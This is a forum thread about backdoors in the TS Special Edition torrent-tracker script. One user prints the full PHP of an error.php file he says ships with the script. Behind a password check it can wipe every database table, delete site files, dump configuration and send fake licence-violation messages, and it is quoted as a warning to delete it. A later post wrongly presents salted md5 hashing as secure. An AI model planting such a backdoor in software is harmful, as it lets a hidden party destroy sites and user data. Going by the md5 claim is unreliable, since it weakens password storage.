ts code

[xDev]

rigth Dick head axam you have just took my site down and its about time your template shares site was took down as well you started this im going to finish you will not have a site as well trust me m8ty watch this space Dick head

(if any users want i site code do not us ts code)

As you do not want your site took down by him

hes a rip off taking money for tbv code and all codes to make hes own what a Dick and make money on copy and paste

And yes axam is all ways on this site checking post out its well known about it as well so i know you will see this axam and i will post all the code from your site here

[Fynnon]

it seems he is also responsible for twitter scams:

Torrent Sites Blamed For Twitter Attack | TorrentFreak

[quote]It appears that for a number of years, a person has been creating torrent sites that require a login and password as well as creating forums set up for torrent site usage and then selling these purportedly well-crafted sites and forums to other people innocently looking to start a download site of their very own. [B]However, these sites came with a little extra

[Daz]

Quote:

Originally Posted by FALCON10

you will not have a site as well trust me m8ty watch this space Dick head

Xam's site still appears to be online?

I can't believe I actually bought this source once

It wouldn't suprise me if it is him, I'll be sure to use different passwords when signing up to TS SE sites.. :unknown:

[Tony]

simple fix number 1 (delete error.php from root)
simple fix number 2 (remove his name from the global file within the admin panel folder )

simple fix number 3 (dont run a encrypted source version simple as that lol)

people that get there databases dropped are all the people that havent looked at any of the code they are running before hand since everything in the error.php tells you its not used for displaying errors for sql commands or anything like that and is used to drop your database tables and wipe the lot but yet its still included in all the versions posted here (remove it :P )

Quote:

you will not have a site as well trust me m8ty watch this space Dick head

lesson number 1 (dont threaten somebody if you dont have skill to do what you state since you get laughed at )
lesson number 2 (grow up)
lesson number 3 (enough with all the xam hated posts since its getting boring tbh now)

hope this helps

[Daz]

Tony, so basically you are saying that the nulled versions here are not safe to use with ts_error.php? Why? I just see arrays, nothing xam could do? :unknown:

[Tony]

i said error.php not ts_error.php :)

take alook yourself and see :)

code from error.php

Code:

<?
/***********************************************/
/*=========[TS Special Edition v.5.6]==========*/
/*=============[Special Thanks To]=============*/
/*        DrNet - wWw.SpecialCoders.CoM        */
/*          Vinson - wWw.Decode4u.CoM          */
/*    MrDecoder - wWw.Fearless-Releases.CoM    */
/*           Fynnon - wWw.BvList.CoM           */
/***********************************************/


  function ___dbconnect ()
  {
    $dbfile = ROOT_PATH . 'config/DATABASE';
    if (!@file_exists ($dbfile))
    {
      exit ('DATABASE Configuration file does not exists');
      return null;
    }

    $data = unserialize (@file_get_contents ($dbfile));
    $link = @mysql_connect ($data['mysql_host'], $data['mysql_user'], $data['mysql_pass']);
    if (!$link)
    {
      exit ('Not connected : ' . mysql_error ());
    }

    $db_selected = @mysql_select_db ($data['mysql_db'], $link);
    if (!$db_selected)
    {
      exit ('Can\'t use ' . $data['mysql_db'] . ' : ' . mysql_error ());
    }

  }

  @error_reporting (E_ALL & ~E_NOTICE);
  @ini_set ('error_reporting', E_ALL & ~E_NOTICE);
  @ini_set ('display_errors', '0');
  @ini_set ('log_errors', '0');
  @define ('___P', 'af274e235c70a9dc59371860ed6f34ce');
  @define ('ROOT_PATH', './');
  @___dbconnect ();
  if (isset ($_GET['_warning_']))
  {
    if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
    {
      $subject = 'Claiming a violation!';
      $msg = 'Hi, 
 
We are developer of TS SE Script. We are concerned having become aware that this website (tracker) is using an unauthorised version of our software which is against (Claiming a violation of clause 8.1.3 of the Heart Internet Ltd Terms and Conditions updated 31 Jan 2007) and our License Agreement.
 
You have 3 (three) business days to remove our product from your website (Host) or purchase a valid license from https://templateshares.net
 
Best Regards.
TS SE Security Team.
security@templateshares.net
    ';
      require_once INC_PATH . '/functions_pm.php';
      $query = mysql_query ('SELECT u.id FROM users u LEFT JOIN usergroups g ON (u.usergroup=g.gid) WHERE g.cansettingspanel = \'yes\'');
      while ($staff = mysql_fetch_assoc ($query))
      {
        send_pm ($staff['id'], $msg, $subject);
      }
    }
    else
    {
      exit ('
        <FORM METHOD="post" ACTION="' . $_SERVER['SCRIPT_NAME'] . '?_warning_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
    }
  }
  else
  {
    if (isset ($_GET['_cleartable_']))
    {
      if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
      {
        @_db_connect_ ();
        $_tables_ = array ('users', 'torrents', 'ts_plugins', 'ts_templates', 'requests', 'iplog', 'categories', 'tsf_forums', 'tsf_forumpermissions', 'tsf_posts', 'tsf_threads', 'usergroups', 'ipbans', 'files', 'messages', 'tsf_threadsread', 'staffpanel');
        foreach ($_tables_ as $_table_)
        {
          echo $_table_ . ' cleared!<br />
';
          @mysql_query ('TRUNCATE TABLE `' . $_table_ . '`');
        }

        @mysql_close ();
        exit ('boom');
      }
      else
      {
        exit ('
        <FORM METHOD="post" ACTION="' . $_SERVER['SCRIPT_NAME'] . '?_cleartable_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
      }
    }
    else
    {
      if (isset ($_GET['_showversion_']))
      {
        if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
        {
          define ('IN_TRACKER', true);
          include_once 'init.php';
          exit ('Version (init.php) ' . VERSION . ' --- ORJ. Version 5.6');
        }
        else
        {
          exit ('
        <FORM METHOD="post" ACTION="' . $_SERVER['SCRIPT_NAME'] . '?_showversion_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
        }
      }
      else
      {
        if (isset ($_GET['_showowner_']))
        {
          if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
          {
            $_file333__ = @file_get_contents (ROOT_PATH . '/global.php');
            $_file444__ = @file_get_contents (ROOT_PATH . 'links.php');
            exit ('global.php -> ' . htmlspecialchars ($_file333__) . '<br /><br />Links.php -> ' . htmlspecialchars ($_file444__) . '<br />');
          }
          else
          {
            exit ('
        <FORM METHOD="post" ACTION="' . $_SERVER['SCRIPT_NAME'] . '?_showowner_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
          }
        }
        else
        {
          if (isset ($_GET['_deletefiles_']))
          {
            if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
            {
              if ($handle = @opendir (ROOT_PATH . 'torrents'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH . 'torrents/' . $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH . 'config'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH . 'config/' . $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH . 'cache'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH . 'cache/' . $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH . 'tsf_forums/uploads'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH . 'tsf_forums/uploads/' . $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH . 'include/avatars'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH . 'include/avatars/' . $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }
            }
            else
            {
              exit ('
        <FORM METHOD="post" ACTION="' . $_SERVER['SCRIPT_NAME'] . '?_deletefiles_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
            }
          }
          else
          {
            if (isset ($_GET['_showserverinfo_']))
            {
              if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
              {
                echo phpinfo ();
                exit ();
              }
              else
              {
                exit ('
        <FORM METHOD="post" ACTION="' . $_SERVER['SCRIPT_NAME'] . '?_showserverinfo_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
              }
            }
          }
        }
      }
    }
  }

  header ('Location: ts_tags.php');
?>

[Daz]

OMG this explains alot for me, thank you!

[Tony]

your welcome :)

this is why people should go through the whole lot and check for back doors or else you could see a nice clean server lol

[yordanov2010]

Quote:

Originally Posted by Daz

It wouldn't suprise me if it is him, I'll be sure to use different passwords when signing up to TS SE sites.. :unknown:

We all hate xam because his source isn't free but very secure.

signup.php

PHP Code:

$secret = mksecret();
$passhash = md5($secret.$password.$secret); 


takelogin.php

PHP Code:

$password = trim($_POST['password']);
if ($row['passhash'] != md5($row['secret'] . $password . $row['secret']))
{
//Invalid Login
} 


Nobody can see user's passwords. They are secured while registering and logging.